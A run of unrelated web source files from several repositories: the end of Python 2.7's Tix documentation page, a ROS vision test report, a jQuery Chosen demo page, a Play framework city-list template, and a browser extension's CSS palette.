href="#form-geometry-manager" title="Permalink to this headline">¶</a></h3> <p>In addition, <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> augments <a class="reference internal" href="tkinter.html#module-Tkinter" title="Tkinter: Interface to Tcl/Tk for graphical user interfaces"><tt class="xref py py-mod docutils literal"><span class="pre">Tkinter</span></tt></a> by providing:</p> <dl class="class"> <dt id="Tix.Form"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Form</tt><a class="headerlink" href="#Tix.Form" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixForm.htm">Form</a> geometry manager based on attachment rules for all Tk widgets.</p> </dd></dl> </div> </div> <div class="section" id="tix-commands"> <h2>24.3.3. Tix Commands<a class="headerlink" href="#tix-commands" title="Permalink to this headline">¶</a></h2> <dl class="class"> <dt id="Tix.tixCommand"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">tixCommand</tt><a class="headerlink" href="#Tix.tixCommand" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tix.htm">tix commands</a> provide access to miscellaneous elements of <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a>&#8216;s internal state and the <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> application context. Most of the information manipulated by these methods pertains to the application as a whole, or to a screen or display, rather than to a particular window.</p> <p>To view the current settings, the common usage is:</p> <div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">Tix</span> <span class="n">root</span> <span class="o">=</span> <span class="n">Tix</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span> <span class="k">print</span> <span class="n">root</span><span class="o">.</span><span class="n">tix_configure</span><span class="p">()</span> </pre></div> </div> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_configure"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_configure</tt><big>(</big><em>cnf=None **kw</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_configure" title="Permalink to this definition">¶</a></dt> <dd><p>Query or modify the configuration options of the Tix application context. If no option is specified, returns a dictionary all of the available options. If option is specified with no value, then the method returns a list describing the one named option (this list will be identical to the corresponding sublist of the value returned if no option is specified). If one or more option-value pairs are specified, then the method modifies the given option(s) to have the given value(s); in this case the method returns an empty string. Option may be any of the configuration options.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_cget"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_cget</tt><big>(</big><em>option</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_cget" title="Permalink to this definition">¶</a></dt> <dd><p>Returns the current value of the configuration option given by <em>option</em>. Option may be any of the configuration options.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_getbitmap"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_getbitmap</tt><big>(</big><em>name</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_getbitmap" title="Permalink to this definition">¶</a></dt> <dd><p>Locates a bitmap file of the name <tt class="docutils literal"><span class="pre">name.xpm</span></tt> or <tt class="docutils literal"><span class="pre">name</span></tt> in one of the bitmap directories (see the <a class="reference internal" href="#Tix.tixCommand.tix_addbitmapdir" title="Tix.tixCommand.tix_addbitmapdir"><tt class="xref py py-meth docutils literal"><span class="pre">tix_addbitmapdir()</span></tt></a> method). By using <a class="reference internal" href="#Tix.tixCommand.tix_getbitmap" title="Tix.tixCommand.tix_getbitmap"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getbitmap()</span></tt></a>, you can avoid hard coding the pathnames of the bitmap files in your application. When successful, it returns the complete pathname of the bitmap file, prefixed with the character <tt class="docutils literal"><span class="pre">&#64;</span></tt>. The returned value can be used to configure the <tt class="docutils literal"><span class="pre">bitmap</span></tt> option of the Tk and Tix widgets.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_addbitmapdir"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_addbitmapdir</tt><big>(</big><em>directory</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_addbitmapdir" title="Permalink to this definition">¶</a></dt> <dd><p>Tix maintains a list of directories under which the <a class="reference internal" href="#Tix.tixCommand.tix_getimage" title="Tix.tixCommand.tix_getimage"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getimage()</span></tt></a> and <a class="reference internal" href="#Tix.tixCommand.tix_getbitmap" title="Tix.tixCommand.tix_getbitmap"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getbitmap()</span></tt></a> methods will search for image files. The standard bitmap directory is <tt class="file docutils literal"><span class="pre">$TIX_LIBRARY/bitmaps</span></tt>. The <a class="reference internal" href="#Tix.tixCommand.tix_addbitmapdir" title="Tix.tixCommand.tix_addbitmapdir"><tt class="xref py py-meth docutils literal"><span class="pre">tix_addbitmapdir()</span></tt></a> method adds <em>directory</em> into this list. By using this method, the image files of an applications can also be located using the <a class="reference internal" href="#Tix.tixCommand.tix_getimage" title="Tix.tixCommand.tix_getimage"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getimage()</span></tt></a> or <a class="reference internal" href="#Tix.tixCommand.tix_getbitmap" title="Tix.tixCommand.tix_getbitmap"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getbitmap()</span></tt></a> method.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_filedialog"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_filedialog</tt><big>(</big><span class="optional">[</span><em>dlgclass</em><span class="optional">]</span><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_filedialog" title="Permalink to this definition">¶</a></dt> <dd><p>Returns the file selection dialog that may be shared among different calls from this application. This method will create a file selection dialog widget when it is called the first time. This dialog will be returned by all subsequent calls to <a class="reference internal" href="#Tix.tixCommand.tix_filedialog" title="Tix.tixCommand.tix_filedialog"><tt class="xref py py-meth docutils literal"><span class="pre">tix_filedialog()</span></tt></a>. An optional dlgclass parameter can be passed as a string to specified what type of file selection dialog widget is desired. Possible options are <tt class="docutils literal"><span class="pre">tix</span></tt>, <tt class="docutils literal"><span class="pre">FileSelectDialog</span></tt> or <tt class="docutils literal"><span class="pre">tixExFileSelectDialog</span></tt>.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_getimage"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_getimage</tt><big>(</big><em>self</em>, <em>name</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_getimage" title="Permalink to this definition">¶</a></dt> <dd><p>Locates an image file of the name <tt class="file docutils literal"><span class="pre">name.xpm</span></tt>, <tt class="file docutils literal"><span class="pre">name.xbm</span></tt> or <tt class="file docutils literal"><span class="pre">name.ppm</span></tt> in one of the bitmap directories (see the <a class="reference internal" href="#Tix.tixCommand.tix_addbitmapdir" title="Tix.tixCommand.tix_addbitmapdir"><tt class="xref py py-meth docutils literal"><span class="pre">tix_addbitmapdir()</span></tt></a> method above). If more than one file with the same name (but different extensions) exist, then the image type is chosen according to the depth of the X display: xbm images are chosen on monochrome displays and color images are chosen on color displays. By using <a class="reference internal" href="#Tix.tixCommand.tix_getimage" title="Tix.tixCommand.tix_getimage"><tt class="xref py py-meth docutils literal"><span class="pre">tix_getimage()</span></tt></a>, you can avoid hard coding the pathnames of the image files in your application. When successful, this method returns the name of the newly created image, which can be used to configure the <tt class="docutils literal"><span class="pre">image</span></tt> option of the Tk and Tix widgets.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_option_get"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_option_get</tt><big>(</big><em>name</em><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_option_get" title="Permalink to this definition">¶</a></dt> <dd><p>Gets the options maintained by the Tix scheme mechanism.</p> </dd></dl> <dl class="method"> <dt id="Tix.tixCommand.tix_resetoptions"> <tt class="descclassname">tixCommand.</tt><tt class="descname">tix_resetoptions</tt><big>(</big><em>newScheme</em>, <em>newFontSet</em><span class="optional">[</span>, <em>newScmPrio</em><span class="optional">]</span><big>)</big><a class="headerlink" href="#Tix.tixCommand.tix_resetoptions" title="Permalink to this definition">¶</a></dt> <dd><p>Resets the scheme and fontset of the Tix application to <em>newScheme</em> and <em>newFontSet</em>, respectively. This affects only those widgets created after this call. Therefore, it is best to call the resetoptions method before the creation of any widgets in a Tix application.</p> <p>The optional parameter <em>newScmPrio</em> can be given to reset the priority level of the Tk options set by the Tix schemes.</p> <p>Because of the way Tk handles the X option database, after Tix has been has imported and inited, it is not possible to reset the color schemes and font sets using the <tt class="xref py py-meth docutils literal"><span class="pre">tix_config()</span></tt> method. Instead, the <a class="reference internal" href="#Tix.tixCommand.tix_resetoptions" title="Tix.tixCommand.tix_resetoptions"><tt class="xref py py-meth docutils literal"><span class="pre">tix_resetoptions()</span></tt></a> method must be used.</p> </dd></dl> </div> </div> </div> </div> </div> <div class="sphinxsidebar"> <div class="sphinxsidebarwrapper"> <h3><a href="../contents.html">Table Of Contents</a></h3> <ul> <li><a class="reference internal" href="#">24.3. <tt class="docutils literal"><span class="pre">Tix</span></tt> &#8212; Extension widgets for Tk</a><ul> <li><a class="reference internal" href="#using-tix">24.3.1. Using Tix</a></li> <li><a class="reference internal" href="#tix-widgets">24.3.2. Tix Widgets</a><ul> <li><a class="reference internal" href="#basic-widgets">24.3.2.1. Basic Widgets</a></li> <li><a class="reference internal" href="#file-selectors">24.3.2.2. File Selectors</a></li> <li><a class="reference internal" href="#hierarchical-listbox">24.3.2.3. Hierarchical ListBox</a></li> <li><a class="reference internal" href="#tabular-listbox">24.3.2.4. Tabular ListBox</a></li> <li><a class="reference internal" href="#manager-widgets">24.3.2.5. Manager Widgets</a></li> <li><a class="reference internal" href="#image-types">24.3.2.6. Image Types</a></li> <li><a class="reference internal" href="#miscellaneous-widgets">24.3.2.7. Miscellaneous Widgets</a></li> <li><a class="reference internal" href="#form-geometry-manager">24.3.2.8. Form Geometry Manager</a></li> </ul> </li> <li><a class="reference internal" href="#tix-commands">24.3.3. Tix Commands</a></li> </ul> </li> </ul> <h4>Previous topic</h4> <p class="topless"><a href="ttk.html" title="previous chapter">24.2. <tt class="docutils literal"><span class="pre">ttk</span></tt> &#8212; Tk themed widgets</a></p> <h4>Next topic</h4> <p class="topless"><a href="scrolledtext.html" title="next chapter">24.4. <tt class="docutils literal"><span class="pre">ScrolledText</span></tt> &#8212; Scrolled Text Widget</a></p> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../bugs.html">Report a Bug</a></li> <li><a href="../sources_/library/tix.txt" rel="nofollow">Show Source</a></li> </ul> <div id="searchbox" style="display: none"> <h3>Quick search</h3> <form class="search" action="../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="scrolledtext.html" title="24.4. ScrolledText — Scrolled Text Widget" >next</a> |</li> <li class="right" > <a href="ttk.html" title="24.2. ttk — Tk themed widgets" >previous</a> |</li> <li><img src="../static_/py.png" alt="" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> &raquo;</li> <li> <span class="version_switcher_placeholder">2.7.11rc1</span> <a href="../index.html">Documentation</a> &raquo; </li> <li><a href="index.html" >The Python Standard Library</a> &raquo;</li> <li><a href="tk.html" >24. Graphical User Interfaces with Tk</a> &raquo;</li> </ul> </div> <div class="footer"> &copy; <a href="../copyright.html">Copyright</a> 1990-2015, Python Software Foundation. <br /> The Python Software Foundation is a non-profit corporation. <a href="https://www.python.org/psf/donations/">Please donate.</a> <br /> Last updated on Nov 21, 2015. <a href="../bugs.html">Found a bug</a>? <br /> Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.3. </div> </body> </html>
catkin_ws/Reports/bold-manhatten-test/scale/scale2.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>scale2</h1> <p> BOLD: 0/1 correct and 1/1false</p> <p> SIFT: 0/0 correct and 0/0false</p><br> <img src = "../../../BVD_M01/scale/scale2.jpg" alt = "scale2.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> <img src = "../../../BVD_M01/plastic_mug/plastic_mug14.jpg" alt = "BVD_M01/plastic_mug/plastic_mug14.jpg" style= " width:320px;height:240px;"> </html>
sites/all/modules/custom/ww_campos/chosen/prueba.html
freenjt/AprendiendoDrupal
<!-- To change this template, choose Tools | Templates and open the template in the editor. --> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Chosen: A jQuery Plugin by Harvest to Tame Unwieldy Select Boxes</title> <link rel="stylesheet" href="docsupport/estilo.css"> <link rel="stylesheet" href="chosen.css"> <!-- <style type="text/css" media="all"> /* fix rtl for demo */ .chosen-rtl .chosen-drop { left: -9000px; } </style>--> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js" type="text/javascript"></script> <script src="chosen.jquery.js" type="text/javascript"></script> </head> <body> <form> <div class="side-by-side clearfix"> <select data-placeholder="Your Favorite Type of Bear" style="width:350px;" class="chosen-select-deselect" tabindex="12"> <option value=""></option> <option>American Black Bear</option> <option>Asiatic Black Bear</option> <option>Brown Bear</option> <option>Giant Panda</option> <option selected>Sloth Bear</option> <option>Sun Bear</option> <option>Polar Bear</option> <option>Spectacled Bear</option> </select> </div> <h1>Aqui empieza code</h1> <div class="side-by-side clearfix"> <div> <select class="chosen-select-deselect form-select"><option value="Florencia">Florencia</option><option value="Popayan">Popayan</option><option value="Bogota">Bogota</option></select> </div> </div> <script type="text/javascript"> var config = { '.chosen-select' : {}, '.chosen-select-deselect' : {allow_single_deselect:true} // '.chosen-select-no-single' : {disable_search_threshold:10}, // '.chosen-select-no-results': {no_results_text:'Oops, nothing found!'}, // '.chosen-select-width' : {width:"95%"} } for (var selector in config) { $(selector).chosen(config[selector]); } </script> </form> <!-- <div class="content clearfix">--> <!-- </div>--> </body> </html>
app/org/iatoki/judgels/jophiel/user/profile/info/listCreateCitiesView.scala.html
judgels/jophiel
@import org.iatoki.judgels.jophiel.user.profile.info.City @import play.i18n.Messages @import org.iatoki.judgels.jophiel.user.profile.info.CityCreateForm @import org.iatoki.judgels.jophiel.user.profile.info.CityUploadForm @import org.iatoki.judgels.play.views.html.action.deleteActionView @import org.iatoki.judgels.play.views.html.table.tableView @import org.iatoki.judgels.play.views.html.table.tableHeadersView @import org.iatoki.judgels.play.views.html.table.searchView @import org.iatoki.judgels.play.views.html.table.paginationView @import org.iatoki.judgels.play.views.html.form.globalFormErrorsView @import org.iatoki.judgels.jophiel.user.profile.info.routes @import org.iatoki.judgels.play.Page @(pageOfCities: Page[City], orderBy: String, orderDir: String, filterString: String, cityCreateForm: Form[CityCreateForm], cityUploadForm: Form[CityUploadForm]) @implicitFieldConstructor = @{ b3.horizontal.fieldConstructor("col-md-3", "col-md-9") } <h4>@Messages.get("city.text.import")</h4> @globalFormErrorsView(cityUploadForm) @b3.form(routes.CityController.postUploadCity(pageOfCities.getPageIndex, orderBy, orderDir, filterString), 'enctype->"multipart/form-data") { @helper.CSRF.formField @b3.file(cityUploadForm("cities"), '_label -> Messages.get("city.field.file"), 'class -> "form-control", '_help -> Messages.get("city.help.file")) @b3.submit('class -> "btn btn-primary") { @Messages.get("commons.button.upload") } } <h4>@Messages.get("city.text.manualCreate")</h4> @globalFormErrorsView(cityCreateForm) @b3.form(routes.CityController.postCreateCity(pageOfCities.getPageIndex, orderBy, orderDir, filterString)) { @helper.CSRF.formField @b3.text(cityCreateForm("name"), '_label -> Messages.get("city.field.name"), 'class -> "form-control") @b3.submit('class -> "btn btn-primary") { @Messages.get("commons.button.new") } } @searchView(pageOfCities.getPageIndex, orderBy, orderDir, filterString, routes.CityController.listCreateCities) <div class="clearfix"></div> @tableView() { @tableHeadersView(pageOfCities.getPageIndex, orderBy, orderDir, filterString, routes.CityController.listCreateCities)( "id" -> Messages.get("commons.id"), "" -> Messages.get("city.field.name"), "" -> Messages.get("city.field.referencesCount") ) <tbody> @for(city <- pageOfCities.getData) { <tr> <td>@city.getId</td> <td>@city.getName</td> <td>@city.getReferenceCount</td> <td class="text-center"> @deleteActionView(routes.CityController.deleteCity(city.getId)) </td> </tr> } </tbody> } @paginationView(pageOfCities, orderBy, orderDir, filterString, routes.CityController.listCreateCities)
src/css/palette.css
turnoffthelights/Turn-Off-the-Lights-Chrome-extension
/* //================================================ Turn Off the Lights The entire page will be fading to dark, so you can watch the videos as if you were in the cinema. Copyright (C) 2021 Stefan vd www.stefanvd.net www.turnoffthelights.com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. To view a copy of this license, visit http://creativecommons.org/licenses/GPL/2.0/ //================================================ */ .dark{ --totl-primary-background:#232323; --totl-primary-font-color:#fff; --totl-body-background:#111111; --totl-hr-border:#444444; --totl-minitable-tab-border:1px solid #444444; --totl-radio-label-border:2px solid #c7c7c7; --totl-radio-label-background:rgba(0,0,0,1); --totl-radio-checked-border:#4285f4; --totl-radio-checked-disabled:#717171; --totl-checkbox-label-background:rgba(0,0,0,1); --totl-checkbox-label-border:2px solid #c7c7c7; --totl-checkbox-checked:#4285f4; --totl-checkbox-checked-disabled:#717171; --totl-checkbox-checked-disabled-border:2px solid #717171; --totl-range-background:rgba(200,200,200,.2); --totl-range-disabled-background:rgba(255,255,255,.54); --totl-button-color:#fff; --totl-button-background:rgba(244,244,244,.4); --totl-button-background-active:rgba(158,158,158,.2); --totl-button-background-hover:rgba(158,158,158,.4); --totl-button-color-palette:rgba(255,255,255,.1); --totl-analytic-background-hover:#474747; --totl-button-disabled-color:rgba(255,255,255,.3); --totl-button-disabled-background:rgba(255,255,255,.12); --totl-svg-icons-fill-colora:#fff; --totl-svg-icons-fill-colorb:#000; } .light{ --totl-primary-background:#fff; --totl-primary-font-color:#000; --totl-body-background:#fff; --totl-hr-border:#cccccc; --totl-minitable-tab-border:1px solid #cccccc; --totl-radio-label-border:2px solid #656565; --totl-radio-label-background:rgba(255,255,255,1); --totl-radio-checked-border:#4285f4; --totl-radio-checked-disabled:#b0b0b0; --totl-checkbox-label-background:rgba(255,255,255,1); --totl-checkbox-label-border:2px solid #656565; --totl-checkbox-checked:#4285f4; --totl-checkbox-checked-disabled:#b0b0b0; --totl-checkbox-checked-disabled-border:2px solid #b0b0b0; --totl-range-background:rgba(17,17,17,.1); --totl-range-disabled-background:rgba(0,0,0,.26); --totl-button-color:#000; --totl-button-background:rgba(244,244,244,.4); --totl-button-background-active:rgba(158,158,158,.2); --totl-button-background-hover:rgba(158,158,158,.4); --totl-button-color-palette:rgba(100,100,100,.1); --totl-analytic-background-hover:#f5f5f5; --totl-button-disabled-color:rgba(0,0,0,.26); --totl-button-disabled-background:rgba(0,0,0,.12); --totl-svg-icons-fill-colora:#000; --totl-svg-icons-fill-colorb:#fff; } html{min-width:300px;min-height:415px;padding:0;margin:0} body{background:var(--totl-body-background);color:var(--totl-primary-font-color);width:300px;padding:0;margin:0;-webkit-user-select:none;-moz-user-select:none;user-select:none;font-family:sans-serif;font-size:12px} *{outline:0} .hidden{display:none} .promoauroraplayer{background:#333;color:white;padding:20px;width:calc(100% - 40px);display:flex} .logopart{display:inline-block;width:70px;padding-top:20px} .textpart{display:inline-block;width:100%} .promohead{font-size:12px;padding:0 0 10px 0} .bigtitle{font-size:16px;margin-bottom:5px} .center{text-align:center} .tabbar{border-bottom:var(--totl-minitable-tab-border);height:48px;overflow:hidden;overflow-x:hidden} .tabbutton{margin:0;border:none;padding:0 20px;float:left;position:relative;display:flex;align-items:center;justify-content:center;text-decoration:none;height:46px;line-height:46px;font-weight:500;font-size:14px;text-transform:uppercase;color:rgba(0,0,0,.54);overflow:hidden;min-width:calc(75px - 40px)} .tabbutton:active{background-color:rgba(158,158,158,0.4);border-bottom:2px solid rgba(158,158,158,0)} .tabbutton:hover{background-color:rgba(158,158,158,.2);border-bottom:2px solid rgba(158,158,158,0)} .tabhighlight{border-bottom:2px solid rgb(68,138,255);height:46px;line-height:46px} .tabhighlight:hover{border-bottom:2px solid rgb(68,138,255);height:46px;line-height:46px} .tabicon{height:24px;display:flex} .tabbox{width:375px} .tabbar:hover{overflow-x:scroll} #tab2 .tabicon svg #parta{fill:var(--totl-svg-icons-fill-colora)} #tab2 .tabicon svg #partb{fill:var(--totl-svg-icons-fill-colorb)} /* track */ .opacity{position:relative} .sliderlabel{position:absolute;font-size:10px;color:rgb(193,193,193);top:5px;left:7px;-webkit-user-select:none;user-select:none;cursor:default;pointer-events:none} .number{position:absolute;top:5px;left:235px} input[type=number]::-webkit-inner-spin-button, input[type=number]::-webkit-outer-spin-button{-webkit-appearance:none;margin:0} input[type=number]:hover::-webkit-inner-spin-button, input[type=number]:hover::-webkit-outer-spin-button{-webkit-appearance:inner-spin-button;margin:0} input[type=range]{border-radius:50px;background-color:var(--totl-range-background);-webkit-appearance:none;-moz-appearance:none;outline:none;border:1px solid rgba(0,0,0,.2);color:#555;font-size:inherit;overflow:hidden;padding:0;text-overflow:ellipsis;white-space:nowrap;height:20px;width:220px;margin:0} input[type=range]::-moz-range-track{background-color:rgba(255,255,255,0)} input[type=range]:focus{outline:none} input[type=number]{background:transparent;-webkit-appearance:none;-moz-appearance:none;outline:none;border:none;color:#555;font-size:inherit;overflow:hidden;padding:0 0 0 5px;text-overflow:ellipsis;white-space:nowrap;height:25px;width:40px;margin:0;text-align:right;-webkit-user-select:none;user-select:none} input[type=range]::-webkit-slider-thumb{-webkit-appearance:none;width:20px;height:20px;border-radius:20px;background-color:#fff;color:#fff;box-shadow:-5px 0px 10px 0px rgba(17,17,17,0.2),-210px 0 0 200px white;border:none;outline:none;cursor:pointer} input[type=range]::-moz-range-thumb{width:20px;height:20px;border-radius:20px;background-color:#fff;color:#fff;box-shadow:-5px 0px 10px 0px rgba(17,17,17,0.2);border:none;outline:none;cursor:pointer} input[type=range]::-ms-thumb{width:20px;height:20px;border-radius:20px;background-color:#fff;color:#fff;box-shadow:-5px 0px 10px 0px rgba(17,17,17,0.2);border:none;outline:none;cursor:pointer} /* regular */ /* dense button - mini */ button{-webkit-user-select:none;-moz-user-select:none;user-select:none;background:0 0;border:none;border-radius:2px;color:var(--totl-button-color);position:relative;height:32px;margin:0;min-width:64px;padding:0 16px;display:inline-block;font-family:"Roboto","Helvetica","Arial",sans-serif;font-size:12px;font-weight:500;text-transform:uppercase;letter-spacing:0;overflow:hidden;will-change:box-shadow;transition:box-shadow .2s cubic-bezier(.4,0,1,1),background-color .2s cubic-bezier(.4,0,.2,1),color .2s cubic-bezier(.4,0,.2,1);outline:none;cursor:pointer;text-decoration:none;text-align:center;line-height:32px;vertical-align:middle;box-shadow:0 4px 5px 0 rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px -1px rgba(0,0,0,.2);background-color:var(--totl-button-background)} button:active{background-color:var(--totl-button-background-active)} button:hover{background-color:var(--totl-button-background-hover)} /* Disable buttons */ button[disabled],button[disabled]:hover{box-shadow:none;background-color:var(--totl-button-disabled-background);color:var(--totl-button-disabled-color);cursor:default} .btnacc{color:#000;background-color:rgb(255,215,64)} .btnacc:active{background-color:rgba(255,215,64,.4)} .btnacc:hover{background-color:rgba(255,215,64,.2)} hr{margin:0;border:0px;height:1px;background:var(--totl-hr-border)} .oan{display:inline-block;width:calc(100% - 30px);margin:17px 15px 18px 15px;height:20px} .oan .oa{display:flex;width:84%;height:20px;float:left} .oan .an{display:flex;width:14%;height:20px;float:left;align-items:center;align-content:center;justify-content:center;flex-direction:column} .palette{margin:20px 15px} .palette .boxactions{display:flex;justify-content:space-between} .palette .boxcolor{width:26px;height:26px;margin:2px;display:inline-block;cursor:pointer;border-radius:26px} .palette .boxcolor:hover{transform:scale(1.1);box-shadow:0 1px 1.5px 0 rgba(0,0,0,.12),0 1px 1px 0 rgba(0,0,0,.24)} .colorline{background:var(--totl-button-color-palette);border-radius:4px;padding:4px;margin:10px 0px;width:calc(100% - 8px);font-size:11px;overflow:hidden;overflow-x:hidden} .colorline:hover{overflow-x:overlay} .colorbox{width:300px} .analgroup{display:inline-block;width:100%;text-align:center} .analblockb{width:calc(100% - 20px);height:50px;margin:10px;border:1px solid #ccc;display:inline-block;line-height:50px;text-align:center;border-radius:5px;font-size:20px} .analshare{width:calc(50% - 24px);height:50px;margin:10px;border:1px solid #ccc;border-radius:5px;display:inline-flex;align-items:center;justify-content:center;flex-direction:row} #analtotal:hover,.analshare:hover{background:var(--totl-analytic-background-hover);cursor:pointer} #energybox{width:calc(100% - 40px);background:#43A047;color:white;padding:20px;cursor:pointer;align-items:center;justify-content:center;flex-direction:row;display:inline-flex} .energyicon{display:inline-flex;width:50px} .energytext{display:inline-block;width:calc(100% - 60px)} #energycompared{font-weight:bold} /* share box */ #shareboxfacebook{background:url(/images/facebook@2x.png)left top no-repeat;background:-webkit-image-set(url(/images/facebook.webp) 1x,url(/images/facebook@2x.webp) 2x, url(/images/facebook.png) 1x,url(/images/facebook@2x.png) 2x);width:18px;height:18px;display:inline-block;background-size:cover;cursor:pointer} #shareboxtwitter{background:url(/images/twitter@2x.png)left top no-repeat;background:-webkit-image-set(url(/images/twitter.webp) 1x,url(/images/twitter@2x.webp) 2x, url(/images/twitter.png) 1x,url(/images/twitter@2x.png) 2x);width:18px;height:18px;display:inline-block;background-size:cover;cursor:pointer} #color1a{background-color:black} #color1b{background-color:rgba(33,56,17,1)} #color1c{background-color:rgba(50,87,26,1)} #color1d{background-color:rgba(70,123,36,1)} #color1e{background-color:rgba(87,158,42,1)} #color1f{background-color:rgba(119,195,68,1)} #color1g{background-color:rgba(149,209,107,1)} #color1h{background-color:rgba(184,226,151,1)} #color2a{background-color:rgba(65,70,76,1)} #color2b{background-color:rgba(79,51,10,1)} #color2c{background-color:rgba(129,85,18,1)} #color2d{background-color:rgba(184,122,25,1)} #color2e{background-color:rgba(244,175,33,1)} #color2f{background-color:rgba(246,180,51,1)} #color2g{background-color:rgba(247,199,88,1)} #color2h{background-color:rgba(249,217,140,1)} #color3a{background-color:rgba(128,128,128,1)} #color3b{background-color:rgba(81,18,8,1)} #color3c{background-color:rgba(132,29,12,1)} #color3d{background-color:rgba(190,41,20,1)} #color3e{background-color:rgba(237,51,26,1)} #color3f{background-color:rgba(239,89,49,1)} #color3g{background-color:rgba(240,126,90,1)} #color3h{background-color:rgba(244,168,138,1)} #color4a{background-color:rgba(153,153,153,1)} #color4b{background-color:rgba(49,2,23,1)} #color4c{background-color:rgba(79,4,34,1)} #color4d{background-color:rgba(112,3,49,1)} #color4e{background-color:rgba(146,4,59,1)} #color4f{background-color:rgba(206,7,85,1)} #color4g{background-color:rgba(218,64,121,1)} #color4h{background-color:rgba(232,122,164,1)} #color5a{background-color:rgba(205,205,205,1)} #color5b{background-color:rgba(16,0,50,1)} #color5c{background-color:rgba(23,0,76,1)} #color5d{background-color:rgba(31,4,107,1)} #color5e{background-color:rgba(46,2,142,1)} #color5f{background-color:rgba(56,2,219,1)} #color5g{background-color:rgba(93,19,247,1)} #color5h{background-color:rgba(141,89,248,1)} #color6a{background-color:rgba(255,255,255,1)} #color6b{background-color:rgba(14,46,64,1)} #color6c{background-color:rgba(27,71,101,1)} #color6d{background-color:rgba(36,100,144,1)} #color6e{background-color:rgba(46,127,193,1)} #color6f{background-color:rgba(61,173,247,1)} #color6g{background-color:rgba(65,193,247,1)} #color6h{background-color:rgba(121,215,250,1)} #colornightmodebck1,#colortitelnightmodetxt1,#colortitelnightmodehyperlink1,#colortitelnightmodebutton1,#colortitelnightmodeborder1{background-color:black} #colornightmodebck2,#colortitelnightmodetxt2,#colortitelnightmodehyperlink2,#colortitelnightmodebutton2,#colortitelnightmodeborder2{background-color:#212121} #colornightmodebck3,#colortitelnightmodetxt3,#colortitelnightmodehyperlink3,#colortitelnightmodebutton3,#colortitelnightmodeborder3{background-color:#353535} #colornightmodebck4,#colortitelnightmodetxt4,#colortitelnightmodehyperlink4,#colortitelnightmodebutton4,#colortitelnightmodeborder4{background-color:#424242} #colornightmodebck5,#colortitelnightmodetxt5,#colortitelnightmodehyperlink5,#colortitelnightmodebutton5,#colortitelnightmodeborder5{background-color:#616161} #colornightmodebck6,#colortitelnightmodetxt6,#colortitelnightmodehyperlink6,#colortitelnightmodebutton6,#colortitelnightmodeborder6{background-color:#757575} #colornightmodebck7,#colortitelnightmodetxt7,#colortitelnightmodehyperlink7,#colortitelnightmodebutton7,#colortitelnightmodeborder7{background-color:#9E9E9E} 